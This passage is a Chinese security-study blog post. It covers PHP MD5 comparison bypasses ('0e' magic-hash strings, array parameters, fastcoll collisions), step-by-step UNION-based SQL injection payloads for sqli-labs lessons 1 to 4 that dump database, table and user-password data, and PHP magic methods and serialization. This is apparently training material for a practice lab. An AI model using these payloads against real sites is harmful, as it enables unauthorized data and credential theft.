class="number">0e424759758842488633464374063001</span></span><br><span class="line">GEGHBXL </span><br><span class="line"><span class="number">0e248776895502908863709684713578</span></span><br><span class="line">GGHMVOE </span><br><span class="line"><span class="number">0e362766013028313274586933780773</span></span><br><span class="line">GZECLQZ </span><br><span class="line"><span class="number">0e537612333747236407713628225676</span></span><br><span class="line">NWWKITQ </span><br><span class="line"><span class="number">0e763082070976038347657360817689</span></span><br><span class="line">NOOPCJF </span><br><span class="line"><span class="number">0e818888003657176127862245791911</span></span><br><span class="line">MAUXXQC </span><br><span class="line"><span class="number">0e478478466848439040434801845361</span></span><br><span class="line">MMHUWUV </span><br><span class="line"><span class="number">0e701732711630150438129209816536</span></span><br></pre></td></tr></table></figure>

<h4 id="数组绕过（PHP-8-无法绕过）"><a href="#数组绕过（PHP-8-无法绕过）" class="headerlink" title="数组绕过（PHP 8 无法绕过）"></a>数组绕过（PHP 8 无法绕过）</h4><p>在 PHP5 和 PHP7 中，当两个 md5 进行比较时，若参数是不同的数组，那么 <code>==</code> 和 <code>===</code> 比较的结果均为 True</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// /param.php?a[]=1&amp;b[]=2</span></span><br><span class="line"><span class="title function_ invoke__">print_r</span>(PHP_VERSION . <span class="string">&quot;&lt;br&gt;&quot;</span>);</span><br><span class="line"></span><br><span class="line"><span class="variable">$a</span> = <span class="variable">$_GET</span>[<span class="string">&quot;a&quot;</span>];</span><br><span class="line"><span class="variable">$b</span> = <span class="variable">$_GET</span>[<span class="string">&quot;b&quot;</span>];</span><br><span class="line"></span><br><span class="line"><span class="title function_ invoke__">print_r</span>(<span class="variable">$a</span> . <span class="string">&quot;&lt;br&gt;&quot;</span>);</span><br><span class="line"><span class="title function_ invoke__">print_r</span>(<span class="variable">$b</span> . <span class="string">&quot;&lt;br&gt;&quot;</span>);</span><br><span class="line"></span><br><span class="line"><span class="title function_ invoke__">print_r</span>(<span class="title function_ invoke__">var_dump</span>(<span class="title function_ invoke__">md5</span>(<span class="variable">$a</span>) === <span class="title function_ invoke__">md5</span>(<span class="variable">$b</span>)));</span><br><span class="line"></span><br></pre></td></tr></table></figure>



<h4 id="md5-碰撞"><a href="#md5-碰撞" class="headerlink" title="md5 碰撞"></a>md5 碰撞</h4><p>利用 fastcoll 进行 md5 碰撞，生成两个字面值不同但 md5 相同的文件。<br>新建一个空的 txt 文档。</p>
<p>然后拖到 exe 上，自动生成两个文件。</p>
<p>得到两个文件，通过代码读取即可。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="variable">$a</span> = <span class="title function_ invoke__">file_get_contents</span>(<span class="string">&#x27;D:tmp\a_msg1.txt&#x27;</span>);</span><br><span class="line"><span class="variable">$b</span> = <span class="title function_ invoke__">file_get_contents</span>(<span class="string">&#x27;D:tmp\a_msg2.txt&#x27;</span>);</span><br><span class="line"></span><br><span class="line"><span class="title function_ invoke__">print_r</span>(<span class="variable">$a</span> . <span class="string">&quot;&lt;br&gt;&quot;</span>);</span><br><span class="line"><span class="title function_ invoke__">print_r</span>(<span class="variable">$b</span> . <span class="string">&quot;&lt;br&gt;&quot;</span>);</span><br><span class="line"><span class="title function_ invoke__">print_r</span>(<span class="title function_ invoke__">var_dump</span>(<span class="variable">$a</span> === <span class="variable">$b</span>) . <span class="string">&quot;&lt;br&gt;&quot;</span>); <span class="comment">// bool(false)</span></span><br><span class="line"><span class="title function_ invoke__">print_r</span>(<span class="title function_ invoke__">var_dump</span>(<span class="title function_ invoke__">md5</span>(<span class="variable">$a</span>) === <span class="title function_ invoke__">md5</span>(<span class="variable">$b</span>)) . <span class="string">&quot;&lt;br&gt;&quot;</span>); <span class="comment">// bool(true)</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>md5 碰撞面对一些绕过非常有用，例如通过参数上传一句话木马</p>
<h3 id="sqli-labs靶场学习"><a href="#sqli-labs靶场学习" class="headerlink" title="sqli-labs靶场学习"></a>sqli-labs靶场学习</h3><h4 id="less1"><a href="#less1" class="headerlink" title="less1"></a>less1</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">#联合注入字符型</span><br><span class="line">?id=1&#x27;				#错误显示</span><br><span class="line">?id=1&#x27;--+			#正常显示，为字符型注入</span><br><span class="line">?id=1&#x27; order by 3 --+	#判断列数</span><br><span class="line">?id=-1 union select 1,2,3		#爆出显示位</span><br><span class="line">?id=-1 union select 1,database(),version()</span><br><span class="line">?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=&#x27;security&#x27;</span><br><span class="line">?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=&#x27;users&#x27;</span><br><span class="line">?id=-1 union select 1,2,group_concat(username ,id , password) from users</span><br><span class="line"> </span><br></pre></td></tr></table></figure>

<h4 id="less2"><a href="#less2" class="headerlink" title="less2"></a>less2</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">#联合注入数字型</span><br><span class="line">&quot;SELECT * FROM users WHERE id=$id LIMIT 0,1&quot;</span><br><span class="line">&quot;SELECT * FROM users WHERE id=1 &#x27; LIMIT 0,1&quot;出错信息。</span><br><span class="line"> </span><br><span class="line"> #数字型</span><br><span class="line">?id=1 order by 3</span><br><span class="line">?id=-1 union select 1,2,3</span><br><span class="line">?id=-1 union select 1,database(),version()</span><br><span class="line">?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=&#x27;security&#x27;</span><br><span class="line">?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=&#x27;users&#x27;</span><br><span class="line">?id=-1 union select 1,2,group_concat(username ,id , password) from users</span><br><span class="line"> </span><br></pre></td></tr></table></figure>



<h4 id="less3"><a href="#less3" class="headerlink" title="less3"></a>less3</h4><p>![](C:\Users\tong\Pictures\Screenshots\屏幕截图 2023-10-17 170104.png)</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">#联合注入字符型</span><br><span class="line">?id=2&#x27;)--+</span><br><span class="line">?id=1&#x27;) order by 3--+</span><br><span class="line">?id=-1&#x27;) union select 1,2,3--+</span><br><span class="line">?id=-1&#x27;) union select 1,database(),version()--+</span><br><span class="line">?id=-1&#x27;) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=&#x27;security&#x27;--+</span><br><span class="line">?id=-1&#x27;) union select 1,2,group_concat(column_name) from information_schema.columns where table_name=&#x27;users&#x27;--+</span><br><span class="line">?id=-1&#x27;) union select 1,2,group_concat(username ,id , password) from users--+</span><br></pre></td></tr></table></figure>



<h4 id="less4"><a href="#less4" class="headerlink" title="less4"></a>less4</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">?id=1&quot;) order by 3--+</span><br><span class="line">?id=-1&quot;) union select 1,2,3--+</span><br><span class="line">?id=-1&quot;) union select 1,database(),version()--+</span><br><span class="line">?id=-1&quot;) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=&#x27;security&#x27;--+</span><br><span class="line">?id=-1&quot;) union select 1,2,group_concat(column_name) from information_schema.columns where table_name=&#x27;users&#x27;--+</span><br><span class="line">?id=-1&quot;) union select 1,2,group_concat(username ,id , password) from users--+</span><br></pre></td></tr></table></figure>











<h3 id="php反序列化"><a href="#php反序列化" class="headerlink" title="php反序列化"></a>php反序列化</h3><h4 id="1-魔法方法"><a href="#1-魔法方法" class="headerlink" title="1.魔法方法"></a>1.魔法方法</h4><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="title function_ invoke__">__construct</span>()            <span class="comment">//类的构造函数，创建对象时触发</span></span><br><span class="line"></span><br><span class="line"><span class="title function_ invoke__">__destruct</span>()             <span class="comment">//类的析构函数，对象被销毁时触发</span></span><br><span class="line"></span><br><span class="line"><span class="title function_ invoke__">__call</span>()                 <span class="comment">//在对象上下文中调用不可访问的方法时触发</span></span><br><span class="line"></span><br><span class="line"><span class="title function_ invoke__">__callStatic</span>()           <span class="comment">//在静态上下文中调用不可访问的方法时触发</span></span><br><span class="line"></span><br><span class="line"><span class="title function_ invoke__">__get</span>()                  <span class="comment">//读取不可访问属性的值时，这里的不可访问包含私有属性或未定义</span></span><br><span class="line"></span><br><span class="line"><span class="title function_ invoke__">__set</span>()                  <span class="comment">//在给不可访问属性赋值时触发</span></span><br><span class="line"></span><br><span class="line"><span class="title function_ invoke__">__isset</span>()                <span class="comment">//当对不可访问属性调用 isset() 或 empty() 时触发</span></span><br><span class="line"></span><br><span class="line"><span class="title function_ invoke__">__unset</span>()                <span class="comment">//在不可访问的属性上使用unset()时触发</span></span><br><span class="line"></span><br><span class="line"><span class="title function_ invoke__">__invoke</span>()               <span class="comment">//当尝试以调用函数的方式调用一个对象时触发</span></span><br><span class="line"></span><br><span class="line"><span class="title function_ invoke__">__sleep</span>()                <span class="comment">//执行serialize()时，先会调用这个方法</span></span><br><span class="line"></span><br><span class="line"><span class="title function_ invoke__">__wakeup</span>()               <span class="comment">//执行unserialize()时，先会调用这个方法</span></span><br><span class="line"></span><br><span class="line"><span class="title function_ invoke__">__toString</span>()             <span class="comment">//当反序列化后的对象被输出在模板中的时候（转换成字符串的时候）自动调用</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>



<h4 id="2-序列化"><a href="#2-序列化" class="headerlink" title="2.序列化"></a>2.序列化</h4><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">User</span></span></span><br><span class="line"><span class="class"></span>&#123;</span><br><span class="line">    <span class="comment">//类的数据</span></span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$age</span> = <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$name</span> = <span class="string">&#x27;&#x27;</span>;</span><br><span class="line">    <span class="comment">//输出数据</span></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">printdata</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&#x27;User &#x27;</span>.<span class="variable language_">$this</span>-&gt;name.<span class="string">&#x27; is &#x27;</span>.<span class="variable language_">$this</span>-&gt;age.<span class="string">&#x27; years old.&lt;br /&gt;&#x27;</span>;</span><br><span class="line">    &#125; <span class="comment">// “.”表示字符串连接</span></span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">//创建一个对象</span></span><br><span class="line"><span class="variable">$usr</span> = <span class="keyword">new</span> <span class="title class_">User</span>();</span><br><span class="line"><span class="comment">//设置数据</span></span><br><span class="line"><span class="variable">$usr</span>-&gt;age = <span class="number">18</span>;</span><br><span class="line"><span class="variable">$usr</span>-&gt;name = <span class="string">&#x27;Hardworking666&#x27;</span>;</span><br><span class="line"><span class="comment">//输出数据</span></span><br><span class="line"><span class="variable">$usr</span>-&gt;<span class="title function_ invoke__">printdata</span>();</span><br><span class="line"><span class="comment">//输出序列化后的数据</span></span><br><span class="line"><span class="keyword">echo</span> <span class="title function_ invoke__">serialize</span>(<span class="variable">$usr</span>)</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>输出结果</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">User Hardworking666 is <span class="number">18</span> years old.</span><br><span class="line">O:<span class="number">4</span>:<span class="string">&quot;User&quot;</span>:<span class="number">2</span>:&#123;s:<span class="number">3</span>:<span class="string">&quot;age&quot;</span>;i:<span class="number">18</span>;s:<span class="number">4</span>:<span class="string">&quot;name&quot;</span>;s:<span class="number">14</span>:<span class="string">&quot;Hardworking666&quot;</span>;&#125;</span><br></pre></td></tr></table></figure>

<p>序列化格式</p>

      
       <hr><span style="font-style: italic;color: gray;"> 转载请注明来源，欢迎对文章中的引用来源进行考证，欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论，也可以邮件至 jaytp@qq.com </span>
    </div>
</article>


<p>
    <a  class="dashang" onclick="dashangToggle()">💰</a>
</p>






    




    </div>
    <div class="copyright">
        <p class="footer-entry">
    ©2016-2020 Yelog
</p>
<p class="footer-entry">Built with <a href="https://hexo.io/" target="_blank">Hexo</a> and <a href="https://github.com/yelog/hexo-theme-3-hexo" target="_blank">3-hexo</a> theme</p>

    </div>
    <div class="full-toc">
        <button class="full" data-title="切换全屏 快捷键 s"><span class="min "></span></button>
<a class="" id="rocket" ></a>

    </div>
</div>

<div class="hide_box" onclick="dashangToggle()"></div>
<div class="shang_box">
    <a class="shang_close"  onclick="dashangToggle()">×</a>
    <div class="shang_tit">
        <p>Help us with donation</p>
    </div>
    <div class="shang_payimg">
        <div class="pay_img">
            <img src="/img/alipay.jpg" class="alipay" title="扫码支持">
            <img src="/img/weixin.jpg" class="weixin" title="扫码支持">
        </div>
    </div>
    <div class="shang_payselect">
        <span><label><input type="radio" name="pay" checked value="alipay">alipay</label></span><span><label><input type="radio" name="pay" value="weixin">weixin</label></span>
    </div>
</div>


</body>
<script src="/js/jquery.pjax.js?v=1.1.0" ></script>

<script src="/js/script.js?v=1.1.0" ></script>
<script>
    var img_resize = 'default';
    function initArticle() {
        /*渲染对应的表格样式*/
        
            $("#post .pjax table").addClass("green_title");
        

        /*渲染打赏样式*/
        
        $("input[name=pay]").on("click", function () {
            if($("input[name=pay]:checked").val()=="weixin"){
                $(".shang_box .shang_payimg .pay_img").addClass("weixin_img");
            } else {
                $(".shang_box .shang_payimg .pay_img").removeClass("weixin_img");
            }
        })
        

        /*高亮代码块行号*/
        

        /*访问数量*/
        
        $.getScript("//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js");
        

        /*代码高亮，行号对齐*/
        $('.pre-numbering').css('line-height',$('.has-numbering').css('line-height'));

        
        
    }

    /*打赏页面隐藏与展示*/
    
    function dashangToggle() {
        $(".shang_box").fadeToggle();
        $(".hide_box").fadeToggle();
    }
    

</script>

<!--加入行号的高亮代码块样式-->

<!--自定义样式设置-->
<style>
    
    
    .nav {
        width: 542px;
    }
    .nav.fullscreen {
        margin-left: -542px;
    }
    .nav-left {
        width: 120px;
    }
    
    
    @media screen and (max-width: 1468px) {
        .nav {
            width: 492px;
        }
        .nav.fullscreen {
            margin-left: -492px;
        }
        .nav-left {
            width: 100px;
        }
    }
    
    
    @media screen and (max-width: 1024px) {
        .nav {
            width: 492px;
            margin-left: -492px
        }
        .nav.fullscreen {
            margin-left: 0;
        }
    }
    
    @media screen and (max-width: 426px) {
        .nav {
            width: 100%;
        }
        .nav-left {
            width: 100%;
        }
    }
    
    
    .nav-right .title-list nav a .post-title, .nav-right .title-list #local-search-result a .post-title {
        color: #383636;
    }
    
    
    .nav-right .title-list nav a .post-date, .nav-right .title-list #local-search-result a .post-date {
        color: #5e5e5f;
    }
    
    
    .nav-right nav a.hover, #local-search-result a.hover{
        background-color: #e2e0e0;
    }
    
    

    /*列表样式*/
    

    /* 背景图样式 */
    
    


    /*引用块样式*/
    

    /*文章列表背景图*/
    

    
</style>







</html>
